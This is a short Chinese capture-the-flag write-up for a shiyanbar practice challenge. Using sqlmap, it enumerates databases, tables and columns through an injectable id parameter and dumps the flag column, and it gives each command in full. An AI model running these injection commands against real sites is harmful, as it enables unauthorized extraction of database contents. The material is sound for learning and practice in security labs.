S 2 这个看起来有点简单

<!DOCTYPE html>

S.2.这个看起来有点简单

S.2.这个看起来有点简单

工具:sqlmap

看到id=,看源码是get方式提交数据,所以可以用自动化工具试一试。

按照一般套路,先找数据库。

再找数据库里的表,表里面还有列,一路找下去,输出目标列的内容就可以了
命令是这样的:sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dbs

-u 指定url;--dbs表明注入目标是查找有哪些数据库



第一个数据库有四十多个表,第二个俩。第一个就省略了。

命令:sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables




其实也可以先查看当前使用的数据库,而不是每个数据库都看一看,这里只有两个,万一有十几个数据库怎么办。

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db




sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --column

--columns:指定列出字段



sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump

-T:指定要列出字段的表;-C :指定要暴的字段;--dump:将结果导出